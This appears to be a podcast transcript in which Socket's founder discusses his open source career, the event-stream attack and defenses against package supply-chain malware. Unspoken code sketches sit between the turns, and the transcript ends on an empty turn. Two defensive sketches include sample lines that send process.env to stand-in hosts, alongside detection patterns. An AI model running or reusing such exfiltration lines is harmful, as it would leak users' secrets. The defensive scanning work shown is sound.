
Narrator
Modern software relies heavily on open source dependencies, often pulling in thousands of packages maintained by developers all over the world. This accelerates innovation, but also creates serious supply chain risks as attackers increasingly compromise popular libraries to spread malware at scale. Faras Abu Khadija is the founder and CEO of Socket, a security platform designed to protect software projects from open source supply chain attacks. In this episode, he joins Josh Goldberg to talk about his career in open source, open source supply chain attacks, practical security lessons, the expanding attack surface in software development, and more. This episode is hosted by Josh Goldberg, an independent full-time open source developer. Josh works on projects in the TypeScript ecosystem, most notably typescript-eslint, a powerful static analysis toolset for JavaScript and TypeScript. He is also the author of the O'Reilly Learning TypeScript book, a Microsoft MVP for Developer Technologies, and a co-founder of SquiggleConf, a conference for excellent web developer tooling. Find Josh on Bluesky, Fosstodon, and .com as JoshuaKGoldberg.
Josh Goldberg
Faras Abu Khadija, welcome to Software Engineering Daily.
Faras Abu Khadija
Thanks Josh. Glad to be here.
Josh Goldberg
We're excited to have you. You have been in and around open source and general security practices for quite a while. Before we dive into you and Socket, can you tell us how did you get into coding?
Faras Abu Khadija
Yeah, I got into coding when I was in high school. I wanted to build a website to collect my favorite Flash animations. So I was kind of born in the era of Newgrounds and eBaum's World and Albino Blacksheep and all these kinds of sites. I don't know if folks remember these or if they're too young. I don't know the audience of this show, but yeah, I always thought those things were fun and I wanted to kind of collect them all and put them onto one website. So I did a lot of downloading of those SWF files from other people's sites and then rehosting them on my own page. And I had to learn PHP and MySQL to do that, and so that was kind of my first foray.
Josh Goldberg
And then you went into Stanford for computer science after that?
Faras Abu Khadija
I mean, yes, I did go to Stanford to study CS. My high school didn't have a CS class, so I was kind of just self-taught with PHP up until that point. But learning CS at Stanford was amazing. A lot of the other majors at Stanford don't necessarily emphasize teaching well, but that's one thing that the computer science department really stands out in. They have a ton of support. Other undergraduates actually are your TAs and help teach you. And so I learned a ton. I remember the first class I took there was using C. And I remember my first reaction was, how does the computer know that these words are variables if they don't have dollar signs in front of them? Because in PHP every variable has a dollar sign. And so my mind was blown. I had almost spent too much time in PHP in high school, and it took a little bit of unlearning to realize, oh, wow, CS and programming is this really broad thing. It's not just PHP and MySQL.
Josh Goldberg
Do you ever go back and look at the PHP you wrote in high school?
Faras Abu Khadija
I have actually done that before and it's hilarious. I didn't even know about functions, even after years of writing it. I literally just pasted everything multiple times if I needed to do it in more than one place. So it's horrible. But it worked. It kind of didn't matter in some sense. I built a site that, I think at its peak, had like 600,000 annual visitors watching all those Flash videos. And it's kind of funny. I think the lesson from that is that you should just jump in and do stuff. I mean, I obviously would never write code like that now, but if you let doing things the right way get in your way, it can kind of take the fun out of it and stop you from just, I don't know, catching the bug. And I caught the bug. What really got me excited and kept me going in it was this idea that I can put code online and while I'm sleeping, it's working for me. It's serving visitors. People are coming to the site, having a great time, and I'm literally asleep. It's like that scene in Fantasia with the brooms and the buckets. It's automation. It's just this cool idea that this thing is just out there. And I think at one point I put Google AdSense on the site, and so I was like, oh, I'm sleeping and it's making me money, you know. It's such a cool idea. That got me really into stuff in high school and college.
Josh Goldberg
Believe it or not, it's not having excellent clean code that gets a lot of newcomers in. It's the results and being able to have that superpower.
Faras Abu Khadija
Yeah, yeah. That said, like, I also think it's good to use functions. I wouldn't recommend anyone copy what I did in those early days.
Josh Goldberg
Good to know. So that was your first popular website. What was your second popular or hit project or website that got released?
Faras Abu Khadija
So while I was still in high school, I did another site that was around sharing my notes for the AP classes I was taking with other students, so you could go there and access outlines of different chapters in the book. It was kind of like a SparkNotes for AP courses. And that was great because a lot of high schoolers didn't want to read their textbook. And so that was something that got quite popular. That's also when I started learning about SEO and just all the web search type stuff, like, how does Google work? How do you properly, semantically build web pages that Google's going to love indexing and sending visitors to? So that was a cool way to learn. And then after that, when I went to college, there was one other site that I did that was maybe notable, which was called YouTube Instant. And this was kind of the result of a bet that I made with a college roommate of mine. So Google had just announced this thing called Google Instant, which was kind of like autocomplete on steroids. So as you type letters into the search box, instead of just showing you, like, here are five possible searches that you might want to do, it would actually take you to the search results page of the first suggestion before you even hit Enter. So you type A and then it takes you to this actual search page with the 10 links for Apple or whatever it thinks you were searching for. And so I saw that and I was like, oh, that's cool. I bet I could do that for YouTube. And it would be even more cool because now you're typing letters in and you're getting flashes of different videos coming in. It's almost like channel surfing YouTube. And so I bet my friend I could build it in an hour, which was kind of completely ridiculous. I don't know why I did that, but I did.
And then he was like, yeah, I'll take you up on that. And then I actually did build it in three hours. It was very simple. It was just using the YouTube API and putting a video embed into the page. No fancy web frameworks, no futzing with getting TypeScript and React and all that stuff set up. It was just literally one JS file and one HTML file. So very, very simple. Pretty horrible code as well. But I got that up, and then I put a tweet out and a Facebook post out and went to sleep. And then I woke up the next morning and it was completely viral. It had gone across the Internet overnight while I was sleeping. And to this day I don't really know why. If I had to guess, it was because it was pretty fun. Once you used it, people wanted to share it. But it was also because it kind of piggybacked on Google Instant. They had spent two years engineering Google to support that level of new load, you know, just in terms of the number of search pages being loaded as literally everyone is typing letters. It's like 10x or more of the search volume that they had ever had in the past. And so they hyped up how much engineering effort they put into this. And then, lo and behold, some college sophomore comes along and is like, I built the same thing for YouTube in three hours. And then that somehow, unintentionally, became this media story. And then it was fueled even further because the YouTube CEO tweeted to me and said, hey, this is great work. Do you want a job at YouTube? And then that caused a whole other burst of attention. People were talking about how the resume is dead and building projects and putting them out there is the future of getting hired. All these thought pieces came out of it, and I was just kind of swept up in this media storm, basically.
So it was kind of a fun experience to go through as a sophomore and, like, kind of trying to not, like, say something stupid while getting interviewed by NBC or whatever, you know. So it was pretty cool.
Josh Goldberg
That sounds like a very thrilling ride. Are there particular lessons you took away from it that you still use now as a CEO on the other side of the hiring table?
Faras Abu Khadija
Huh? Yeah, I mean, I think the big thing is, like, just launch, like, just ship things. Don't think too much about it, like, build stuff in public. I mean, if I had sat around and, like, I don't know, tried to use the right framework or tried to. And it's funny, I say this, like, I'm actually good at this, but the reality is I'm more saying this as advice to myself. To remember, because I also tend to, like, over engineer things and, like, want to do things the right way and, like, sometimes don't ship. And, like, what I think worked in this case was I just, like, put it out there. It didn't really matter that it was, like, pretty bad code. I, like, put it out there and then I improved after I saw that people actually cared. And so that's the right way to do things. If you're interested in, like, finding something that works or that resonates with people, it's just. It's really about, like, the number of things you put out there, not, like, sitting around in a room by yourself trying to, like, think of the perfect idea. And that's a lesson, like, I've had to learn again over and over in my career, including, like, literally when I started my first company. And we kind of did the opposite of that, where we literally just sat around and, like, built some cool technology for about eight or nine months without really putting it in front of any users. And then at the end learning, actually, nobody wants this. We just spent nine months, like, building. It's a cool science project. I learned a lot. I'm glad I worked on it. But, like, nobody wants to buy this or use this. So I could have probably learned that really quickly if I just talked to people or had put something more minimal out there.
Josh Goldberg
Mm. You are not the first CEO to mention this on this podcast. Yeah, that's a really important learning.
Faras Abu Khadija
Yeah. There was even a guy on Hacker News when YouTube Instant was on the homepage. It was actually on the homepage a couple of times, like, multiple times at the same time. And one of the comments, I remember this, was from this guy, I don't know who he was, but he was really upset that my site was on the homepage. He was like, I've been building the same site for three months and it has way more features and it supports filtering and sorting the videos by views and by different things. And he kind of was explaining all the things it could do that mine couldn't. But then someone replied to him and was like, you should have just shipped. And I saw that and I was like, you know, evidence of this lesson literally in that thread. And, I mean, I obviously felt kind of bad for him. He put in a ton of time. But it sort of proves the point that he should have just shipped, and no one really cares about all the advanced options he was adding. He should have just put it out there sooner.
Josh Goldberg
Yeah, it's a pity. You've shipped quite a few things. We could take this either through your career or through your open source projects in general. Let's talk about the open source projects first because they're quite visible. Is this a continuation of the same mindset, where you've just shipped a bunch of npm packages? How does that play out?
Faras Abu Khadija
Yeah, I mean, so I got into open source originally because of that company I mentioned, which was called PeerCDN. After I worked on it for about eight or nine months, we were basically going to shut it down. And then we got really lucky and, kind of out of nowhere, Yahoo offered to buy the company. And really they wanted us to just join the team and work on JavaScript and video players and stuff like that at Yahoo. So we took the offer because it was me and my two friends and we were like, well, yeah, this sounds like a good way to wrap this up and make something of this unfortunate situation where no one actually wants what we built. Maybe we can go to Yahoo and they'll use it. But they ended up not using the code really at all. They had bigger problems than reducing bandwidth costs of video. And so we ended up just kind of helping with more fundamental things like making their video player load quickly and work on mobile and stuff like that. But I did feel kind of sad that after all that work, you know, that science project I was talking about, all this cool technology we had put into it didn't get to see the light of day and would never get to see the light of day, because now they owned it and it was all proprietary code. I worked there for about a year, and I'm proud of what I did there. But it was also one of those things where, you know, it's a really big company and it was hard to ship things. I felt like I was fighting the company to ship things, which is crazy. At one point my manager said to me, you need to do less. Just stop trying to do all this stuff. You're making my life hard. And I was thinking, this is not why we were acquired. Literally the CEO of Yahoo, Marissa Mayer at the time, who was on a startup acquisition spree, told us the opposite.
She told us, the reason we're buying you is because we want you to inject startup energy and just this attitude of getting things done and shipping stuff into the company, and this is why we're bringing you on. But we were just too few, and we were on a much bigger team with the old school folks that were there before. And so we did some good stuff and there were some really smart people on the team. But ultimately, I think the organization couldn't really handle it. The old blood won rather than the new blood, if that makes sense. So I left, and then I wanted to play with some of the same ideas of what the original company was doing, which was about building a peer-to-peer CDN. So think of a content delivery network like Cloudflare or Akamai, but powered by end user devices. Your laptop is in a network, kind of like BitTorrent, and if you're watching a video, you're going to serve that video to other folks that are coming to the same site. It's sort of like a big peer-to-peer network, and that could speed up sites in some cases. And it could also massively reduce the cost to host sites. Before Cloudflare was really popular, before they started giving everybody bandwidth for free, CDNs were actually quite expensive. And so this was where the idea came from. And so after I left Yahoo, I just decided, oh, it'd be cool to build that again, but in an open source way so that no one can ever take it away from me or from the community. I want this to be open. I want anyone to be able to use this. And so that was why I got into open source. I mean, I had always thought of open source maintainers as this sort of crazy awesome level of programmer that I one day wanted to aspire to be. You know, when I was learning to code, I was almost afraid to look at open source packages because it was all this crazy advanced code. How could you understand what it's doing?
So I kind of always thought it'd be cool to do that and give back in that way. And then I had this opportunity to do it with WebTorrent. And so that's kind of what came out of all this. I ended up building a torrent app that could work in your web browser and do peer-to-peer from my browser tab to your browser tab without any software installed on the computer. And so you could really get a BitTorrent experience on a website.
Josh Goldberg
Which is amusing now because BitTorrent has BitTorrent Web, yeah.
Faras Abu Khadija
And actually they use WebTorrent under the hood. The protocol that we developed, all the major torrent clients actually support WebTorrent now, finally, after like 10 years of trying to get adoption of this standard. So it's pretty cool to see that the vision has actually kind of happened, where any torrent client running on a desktop can talk to a web browser user across that bridge, which is pretty crazy when you think about it, that that's actually possible with WebRTC.
Josh Goldberg
As an open source maintainer, how do you feel when one of the projects you lead or maintain or have worked on becomes successful in this way?
Faras Abu Khadija
That's a fun one. So at first it's awesome, right? I mean, you get to talk about it, people are interested in it, you get invited to speak at NodeConf or JSConf or whatever. And I remember at that time in my life, I was in my early 20s and it was super fun getting to go travel the world. I went to so many countries I'd never been to before, met people. And it was funny too, because they would use me and a few other early Node folks as the mad science track of the conference. So they'd have all these talks on React and kind of practical things like, you know, how do you deploy a microservice and this and that and the other thing. And then they wanted to have certain talks that were like, you're never going to use this at work, but it's just cool. And that's what they would invite me to be, the entertainment, I guess, in that sense. At least I think that's why I was invited to those. And so it was just fun to be able to show people what I was building. And it was also very in public, because honestly for the first six months of talking about WebTorrent, it didn't work. It was literally in development. And I was talking about it and explaining how WebRTC worked and how this was all going to work, and doing some cool demos of WebRTC for people during the talks, some live demos and interactive things with people all interacting on a whiteboard from their phones and on my screen, over a peer-to-peer network. And it was really cool, but it wasn't WebTorrent. And so I was definitely doing it in the open and it was really fun. But then when you get to a certain point in your project, what ends up happening, and I've seen this happen so many times, not just with me, but with almost every maintainer that I know, is that they eventually just get burned out of doing it.
At least for me, what happened was I felt this incredible responsibility to fix every issue that was reported on GitHub. And at first the volume was really low. Someone would open an issue and you'd be like, oh my God, this is so cool. I have a user using this. You're so happy. And then eventually you get to a place where you wake up every morning and it's like 40 issues opened and you're like, oh my God, this is not sustainable. And they were all issues too. I kind of forgot why I got into it almost by the end, because someone's reporting a bug, like, oh, it doesn't work on Arch Linux version whatever. And I'm like, okay, I don't even care. I should have just said to them, you submit a PR if you care about this and I'll review it and merge it. But instead I took it like, oh, it's my job to go and fix it. And so I very much burned myself out by the end and basically needed to walk away, add other folks as maintainers, and just kind of go do something else for a while.
Josh Goldberg
There's a great blog post that you've, I think, alluded to in the past from Nolan Lawson, "What it feels like to be an open-source maintainer," talking about how it's like you have this giant stretch of people in front of you and there's absolutely no way you can address all of them. And it feels awful on both ends.
Faras Abu Khadija
Yeah, it definitely feels like that you want to do the right thing and help them and you feel this obligation because it's like your code and they found a bug and they're right, there is a bug and like, you're correct and so therefore I must fix it. But like, actually there's not a contract saying that you have to do that. It's like, I put this code online as a gift to the world. I didn't promise it would never have a defect. And so it's actually okay. It's actually enough to give a one time gift. You don't have to Give a permanent SaaS subscription of your time as a gift to the whole world. So I think that was the realization that I finally got to. But after getting super burned out.
Josh Goldberg
Let's talk about that dark side of open source because it transitions really well into what you've been doing recently. Specifically, let's talk about security. What is socket.dev and what's the open source problem that it's trying to address?
Faras Abu Khadija
So open source, when it works, is amazing, right? You can just go out and grab any code from the Internet that's written by somebody you don't know. You don't know who they are. You probably didn't even read the code. And you can just pull it in and run it on your computer, and it saves you a ton of time, right? It's this amazing buffet of unlimited, you know, all-you-can-eat code that you can just pull from. But there are bad guys, you know, there are criminals that have realized that getting access to an open source project and putting malicious code into the package is a great way to attack a bunch of people at once at a really large scale. And so we've seen a lot of attacks of this nature over the last several years for all kinds of motives. Sometimes it's politically motivated, it's countries attacking other countries or trying to attack U.S. companies or things like that. Other times it's just basic cryptocurrency criminals that want to steal people's crypto. There have even been cases where people were a good maintainer at one point in time, and then something just snaps in them and they want to watch the world burn. And so they'll put malicious code into their own package that has been trusted for super long. And so it made me start wondering, why is there no way to stop this? Why is there no way to catch this? Especially after the fifth or sixth time I saw this happen, you know. I mean, the first time I saw this happen was in 2017 with event-stream getting compromised. This was a package where a new maintainer was added who basically said, hey, can I help maintain this package? I noticed it hasn't gotten any updates in a while. And they got access. And then after about 30 days of doing some good changes, they put in a malicious change that stole a bunch of cryptocurrency out of a specific application that was targeted.
So they obfuscated the code, and then it only triggered in one specific Electron app. So for everyone else who had the code, it just sort of did a no-op. But in this one app, it would trigger and steal all the user's money. So this kept happening. And then I looked around and I was like, why is no one doing anything about this? Is this just the way the world works? I was also confused. Why is nobody reading the code that they're using? And then I realized I'm really weird, and I read every one of my dependencies before I use it. I mean, maybe not anymore, but when I was working on WebTorrent, certainly it was a small enough surface area that I could actually do that. And then I realized no one else really does this. Some people do, but it's pretty rare. And so that's why there's really not much of an immune system against this. Usually what happens is the attacker makes a mistake that ends up showing in a log file or something, and then the community just accidentally discovers it. And that's what kept happening. It was always like, oh, we accidentally noticed that this package has been stealing everyone's information for the last two weeks. And that's when I was really worried, because I'm like, how many more of these do we not know about if we're just accidentally finding these? So in the event-stream example, let me give you an example of how we found it as a community. It turns out the attacker obfuscated their code and was using the crypto module in Node.js to decrypt the attack code. But they didn't know that, literally a day or two after they backdoored the package, Node decided to deprecate the function that they used. And so everybody who was using the package started getting this deprecation warning. And then they traced it back to this chunk of code that was added into this library. And so that's such a random accident.
If that hadn't happened, it might have gone for weeks or months without being discovered. And this pattern just repeats in every one of these attacks. And so that's kind of like when I was like, dang, this is a problem. And, like, no one seems to know how to solve it.
Josh Goldberg
So what are the techniques that we can use as application developers, separate from, say, socket, just to kind of harden ourselves against these before we go into specific services?
Faras Abu Khadija
Yeah, yeah, for sure. I mean, the number one most important thing that everyone should be doing, and everyone is probably already doing, but if not, you should Use a lock file. So your package manager, probably depending on the language, but almost all of them, support a lock file of some kind. And this is very important because it locks down the specific versions of every package in your dependency tree. And so that when a new person on your team clones the code down and runs the install command to install those packages, they're going to get the exact same set of dependencies that you had when you built the application. And so there's no randomness or there's no new versions being brought in unintentionally. It's very explicit. There's also a record of what versions of every package were in use in the git history. So everyone knows what was in use at every point in time in the application. That's the number one thing you can do. That obviously doesn't stop you from installing a bad package, but at least you're not just pulling in whatever happens to be the latest version at the time you run the install command. And I want to emphasize too, it's important that you're using a lock file, not just pinning your direct dependencies to a specific version. If you pin your direct dependencies, that's a good start, but that doesn't lock down the transitives, because those can also have loose ranges. And then the package manager will go ahead and it will install your direct dependency at that exact version. But then in the transitive dependencies, those can be loose ranges that it'll just pull the latest stuff as well. So you're still subject to really, you're going to get whatever code happens to be there at the time you run install. So that's like. I think that's the biggest thing.
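The difference between pinning direct dependencies and using a lock file can be sketched with a toy resolver. This is a minimal illustration, not how any real package manager is implemented: the package names (`web-framework`, `tiny-util`), the registry contents, and the function names are all hypothetical, and only exact and caret ranges are modeled.

```typescript
// Toy model of dependency resolution; every package name and version here is hypothetical.
type VersionRange = string; // only exact ("1.2.3") and caret ("^1.2.3") ranges are modeled

interface PkgManifest {
  dependencies: Record<string, VersionRange>;
}

// toyRegistry[name][version] is the manifest published for that version.
type ToyRegistry = Record<string, Record<string, PkgManifest>>;
type LockMap = Record<string, string>; // package name -> exact locked version

function parseVersion(v: string): number[] {
  return v.split(".").map(Number);
}

function compareVersions(a: string, b: string): number {
  const x = parseVersion(a);
  const y = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (x[i] !== y[i]) return x[i] - y[i];
  }
  return 0;
}

// Simplified caret rule: same major version and not older than the base.
function satisfiesRange(v: string, range: VersionRange): boolean {
  if (range.charAt(0) !== "^") return v === range;
  const base = range.slice(1);
  return parseVersion(v)[0] === parseVersion(base)[0] && compareVersions(v, base) >= 0;
}

// Walks the tree breadth-first. A locked version wins; otherwise the newest match is taken.
function resolveTree(registry: ToyRegistry, root: PkgManifest, lock?: LockMap): LockMap {
  const resolved: LockMap = {};
  const queue: Array<[string, VersionRange]> = [];
  const enqueue = (deps: Record<string, VersionRange>) => {
    for (const dep of Object.keys(deps)) queue.push([dep, deps[dep]]);
  };
  enqueue(root.dependencies);
  while (queue.length > 0) {
    const [pkg, range] = queue.shift()!;
    if (Object.prototype.hasOwnProperty.call(resolved, pkg)) continue; // toy model: one version per package
    const matches = Object.keys(registry[pkg])
      .filter((v) => satisfiesRange(v, range))
      .sort(compareVersions);
    const locked = lock ? lock[pkg] : undefined;
    const chosen = locked !== undefined ? locked : matches[matches.length - 1];
    if (chosen === undefined) throw new Error("no version of " + pkg + " satisfies " + range);
    resolved[pkg] = chosen;
    enqueue(registry[pkg][chosen].dependencies);
  }
  return resolved;
}

const toyRegistry: ToyRegistry = {
  "web-framework": { "2.0.0": { dependencies: { "tiny-util": "^1.0.0" } } },
  "tiny-util": {
    "1.0.0": { dependencies: {} },
    "1.0.1": { dependencies: {} }, // published later; imagine this one is compromised
  },
};

// The direct dependency is pinned to an exact version, but its own range is loose.
const app: PkgManifest = { dependencies: { "web-framework": "2.0.0" } };
const lockfile: LockMap = { "web-framework": "2.0.0", "tiny-util": "1.0.0" };

console.log(resolveTree(toyRegistry, app));           // tiny-util resolves to 1.0.1
console.log(resolveTree(toyRegistry, app, lockfile)); // tiny-util stays at 1.0.0
```

Even with the direct dependency pinned, the unlocked install picks up whatever version of the transitive package is newest at install time. The lock map is what keeps the whole tree fixed.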
Josh Goldberg
What's another good tip for us?
Faras Abu Khadija
I mean, really, the best tip is to use Socket, and I'm not just saying that because I started the company. But forgetting about the specific solution of Socket, really, you want to have some process for vetting dependencies. You want to know what you're depending on. And I think what really helps is having a bit of a mindset shift around how you think about dependencies. So today a lot of people think about them as, you know, just this magical code that comes from the cloud or from the sky somewhere, and then it just sort of solves your problems for you. And they assume because it's open source, that it must be safe or that someone is vetting it. Right. But that is really not the case. Everyone is assuming that someone else is vetting this code, right? Everyone has that assumption. Oh yeah, it's open source. Someone will vet it. And then you actually realize that very few people are actually opening up the code and looking at it. Shockingly few, right? This is really obvious when you look at the kinds of attacks that have been pulled off by these attackers and not discovered for, you know, like I said, weeks, sometimes months. They're so obvious, these attacks. If you just open one of the JS files or one of the source code files, you would see it doesn't look like normal code. It looks super obfuscated. Or there are these giant Base64 strings in there. There's, you know, the crypto module being imported to decrypt the code, or there's eval happening, you know, a string is being executed as code, or there are obvious things like the environment variables being collected and then sent off in a network request to a suspicious URL. It's horribly obvious when you look at the file. And then you realize, okay, no one is looking at this stuff.
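The red flags listed above (eval, giant Base64 strings, crypto imports, environment variables combined with network access) can be approximated with a few pattern checks. The sketch below is illustrative only: the rule names, the regular expressions, and the 200-character threshold are assumptions made for this example, and a regex pass like this is far cruder than real static analysis.

```typescript
// Illustrative red-flag scanner; rule names and patterns are assumptions, not a real tool's rules.
interface Finding {
  rule: string;
  detail: string;
}

const RED_FLAG_RULES: Array<{ rule: string; pattern: RegExp; detail: string }> = [
  { rule: "eval", pattern: /\beval\s*\(|new\s+Function\s*\(/, detail: "executes a string as code" },
  { rule: "long-base64", pattern: /["'`][A-Za-z0-9+\/=]{200,}["'`]/, detail: "very long Base64-looking string literal" },
  { rule: "crypto-import", pattern: /["'](node:)?crypto["']/, detail: "loads the crypto module" },
  { rule: "env-access", pattern: /process\.env\b/, detail: "reads environment variables" },
  { rule: "network", pattern: /["'](node:)?(https?|net|dgram)["']|\bfetch\s*\(/, detail: "can open network connections" },
];

function scanSource(source: string): Finding[] {
  const findings: Finding[] = [];
  for (const { rule, pattern, detail } of RED_FLAG_RULES) {
    if (pattern.test(source)) findings.push({ rule, detail });
  }
  // Reading the environment and reaching the network together is worth a separate flag.
  const hit = (rule: string) => findings.some((f) => f.rule === rule);
  if (hit("env-access") && hit("network")) {
    findings.push({ rule: "env-exfiltration", detail: "reads environment variables and can reach the network" });
  }
  return findings;
}

// Hypothetical package source that collects the environment and posts it somewhere.
const sample = [
  'const https = require("https");',
  "const body = JSON.stringify(process.env);",
  'https.request("https://collector.example/upload").end(body);',
].join("\n");

console.log(scanSource(sample).map((f) => f.rule));
// [ 'env-access', 'network', 'env-exfiltration' ]
```

None of these signals proves malice on its own, since plenty of legitimate packages read environment variables or make requests. The point is only that a quick look at the file surfaces them.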
Josh Goldberg
So.
Faras Abu Khadija
So this is how it was able to sit in plain sight. It's interesting because Linus Torvalds, you know, the creator of Linux, has this law, I think it's called Linus's Law, that is quite well known. I think it's the idea that with many eyeballs, all bugs are shallow. Hope I'm getting the quote right. But something like that. And the idea is that with open source software, right, eventually with enough eyeballs looking at the code, all bugs will be discovered at some point and then be fixed. And it's true. And he's really highlighting the value of open source code versus proprietary code, and how when you have open code, people can find these things and can fix these things. And that is all true. But the question is on what timescale, right? How long is it going to take for the community to find the bug? And in the case of a malicious actor putting malware into a library that everybody depends on, the time really matters, because some of these things have 10 million downloads a week. And so if something's compromised for even, you know, 24 hours before people notice, you're going to have a lot of affected people, a lot of affected applications and companies. And so I think that's really the caveat: how long until detection? And before we started Socket, what we saw was there's a great research paper published at the USENIX Security conference a few years ago that found that it was around 200-plus days for a malicious package to be discovered by the community and taken down. So really, really bad results, you know what I mean, in terms of hoping for the community to kind of self-correct in this way. So I think the main thing is just shifting and thinking of open source code not as someone else's problem, but actually treating it as your problem. It's part of your application. At the end of the day, all this code gets bundled together and run in a single process or in a single binary or in a single application.
And so it doesn't really matter if you wrote this code and then someone else wrote that other code. Like ultimately you're shipping all that code together to production and like you're responsible for what it does. It has access to all your user data, it has access to all the crown jewels. So you know, at the end of the day it's your code, even though you got it from GitHub or you got it from PyPI.
Josh Goldberg
So we've had this problem where we have an absurdly fast-growing amount of other people's code in our applications these days. We have so many features as developers, we expect hot module reloading and deduplication of packages and all this, that there's just an inhuman amount of code to look through. So having services look at that code for us seems like a natural next step. And you mentioned some somewhat straightforward heuristics like importing the Node crypto module or sending your process environment variables in a network request. Stuff that's almost humorously evil. So how does Socket take a look at other people's code and determine what is something to be complained about?
Faras Abu Khadija
Yeah, great question. So when we started Socket, we started with our own observations about, you know, these types of attacks we were seeing. So things like accessing environment variables, accessing the file system, accessing the network, especially when that was a new behavior in a package. Like, you know, it hadn't done that for any other version in its entire history. And then suddenly now there's a new version that came out yesterday that needs all these capabilities, all these permissions, you know, that weren't needed before. And so that's kind of what we started focusing on, was detecting just that introduction of new risky capabilities. Oh, install scripts is another good one. Not all package managers have this concept, but NPM is a famous one that does. And this is a way to automatically run code on the developer's system at the time of package installation. And while it has legitimate uses, almost every single piece of malware that we were seeing on NPM took advantage of this functionality. So the presence of one of these didn't necessarily mean you were dealing with malware, but all malware pretty much had that characteristic. So you could start to build up these heuristics of what looks like a suspicious change, and then you could sort of alert on them. So if you're about to do an NPM update or you're about to pull in a new package for the first time, you could see what Socket had identified in that package. But then what we found was a lot of teams wanted something even more simple than that. They wanted us to just have like a yes, no, like a Boolean. Is this package malicious or not? And so right as we started noticing that desire from folks, we got our hands on GPT 3.5. We were playing around with this idea of like, can LLMs actually, like, look at code patterns and figure out what the code is doing? 
So not like the, the main way people were using AI at that time was just sort of to build these little chatbots, like you can chat with your database or whatever, right? These types of silly, silly things. In my opinion. We were really asking can they understand the concept of maliciousness and, you know, can they look at, you know, the code and tell you, tell you whether there's something maybe worth a second look? And so it didn't really work that well with GPT 3.5, but then GPT 4 came out and we got access to the API while it was still in, like private beta. And then we found, holy crap, this actually works really well. So what we had to do though was because of cost, right? It's super expensive to use LLMs, especially if you're trying to scan every open source package. NPM alone has like 2 million packages, not to mention all the other ecosystems. So we had to decide when it was worth the cost and, you know, the expense to actually do that type of analysis. And so we used some of those static signals that we had developed before, like, does it have network? Does it have file system? Does it, you know, eval a string? Does it look like, look like it has obfuscated code? Then we would take just those parts and kind of feed it into the LLM. And that's how we, you know, we built the system that we have today. It still has false positives, but if you put a human in front of it to kind of do the final sign off, you can actually get like a really high signal from it. And so that's kind of what we. One of the like main things that Socket provides for our customers today is like you can get this like really high signal feed whether packages are malicious or not, and then new ones that are being backdoored that no one knows about yet. 
So like if you open up our feed right now, you'll literally find something from 30 minutes ago that was just published that's malicious, that's still live on the package manager registry that you could install if you were so unlucky to do so. And yeah, and we report them when we find them by the way. So we try to get them taken down and protect everybody. But we often get really, really slow response times from the different registries. Some of them are better than others. PyPI is pretty good these days, but like a lot of the other ones are very slow. And so you'll have things where like there's malware from nine months ago that's still live that they just don't take down. So you have to use something like Socket or some other database of this knowledge to kind of protect yourself.
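To make the triage described in this answer concrete, here is a minimal sketch of the "new risky capability" idea: compare the capabilities a previous version of a package appears to use with those of a new version, and escalate to a costlier analysis (an LLM pass, then a human) only when something new shows up. This is not Socket's implementation. The pattern table, the function names, and the sample sources are all assumptions made for illustration, and a real scanner would parse the code rather than pattern-match on text.

```python
import re

# Hypothetical capability signatures for JavaScript source text.
# Illustrative only: a production scanner would analyze the syntax tree.
CAPABILITY_PATTERNS = {
    "network": re.compile(r"require\(['\"](?:https?|net|dns)['\"]\)|\bfetch\("),
    "filesystem": re.compile(r"require\(['\"]fs['\"]\)"),
    "environment": re.compile(r"process\.env\b"),
    "eval": re.compile(r"\beval\(|new Function\("),
}


def detect_capabilities(source: str) -> set[str]:
    """Return the names of the capabilities whose pattern appears in source."""
    return {
        name
        for name, pattern in CAPABILITY_PATTERNS.items()
        if pattern.search(source)
    }


def new_capabilities(previous_source: str, candidate_source: str) -> set[str]:
    """Capabilities present in the candidate version but not in the previous one."""
    return detect_capabilities(candidate_source) - detect_capabilities(previous_source)


def needs_deeper_review(previous_source: str, candidate_source: str) -> bool:
    """Escalate to the expensive analysis only when a new capability appears."""
    return bool(new_capabilities(previous_source, candidate_source))


# Made-up example: a tiny utility that suddenly reads the environment
# and talks to the network in its newest release.
old_version = "module.exports = (a, b) => a + b;"
new_version = (
    "const https = require('https');\n"
    "https.get('https://example.invalid/?d=' + JSON.stringify(process.env));\n"
    "module.exports = (a, b) => a + b;"
)

print(sorted(new_capabilities(old_version, new_version)))
```

Gating on the difference between versions, rather than on the capabilities themselves, keeps the expensive step away from packages that have always needed the network or the file system for legitimate reasons.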
Josh Goldberg
So let's say that I'm a company, I'm an enterprise, I have software with dependencies on, let's say, a couple of registries, NPM and PyPI. What would I do? How do I use Socket to save myself from these ridiculous malware attacks?
Faras Abu Khadija
Yeah, so the easiest way is if you're on GitHub or one of the other major source control systems, GitLab, Bitbucket, you can install Socket from the marketplace and then we just go right into your GitHub installation and we can start observing all pull requests and all commits that are happening on all the repos and we scan every single commit that we see. So we can do two things. First of all, you just get visibility, like what dependencies am I using across all my repositories? And you can have like kind of a snapshot of every point in time as that changes. So if you ever want to know in the future, like, hey, did we ever use this bad package at this bad version number, you can look it up and see, and then you can also get an inventory of like, you know, all of your existing risk. So any malicious packages or vulnerable packages or other risks that you have within your current set of dependencies, you'll be able to see that. But the most important part is the preventative piece. So that's where, you know, in a pull request workflow, whenever a developer is adding a dependency or updating a dependency to a new version, those are the two kind of moments where you're bringing in new third party code for the first time. And so Socket will look at all those changes and if there's any risks, it will leave a comment in the PR and just tell all the folks on the team, the code reviewers as well as the original PR author, about the risk that was identified. And this is all configurable. So obviously malware is frequently what folks want to block, but you can even use it for things like I don't want to use a package that hasn't had an update in five years, that would be a bad idea, or I don't want to use a package that has obfuscated code in there unless I click the link that Socket provides and go and look at why is it doing this? Does it make any sense? 
So you have folks set it up in different ways and you can kind of customize it to what you care about for your team.
Josh Goldberg
Sure. I imagine especially in a time where so many companies and open source projects are using tools like Renovate and Dependabot to automatically send PRs for new packages. Something that's blown my mind is that most of the time, by default, these PRs come in as soon as possible. A lot of default configurations don't say wait for seven days after a package release. This feels like something that Socket would be very useful for to make sure that you're not installing a malicious package immediately upon its introduction.
Faras Abu Khadija
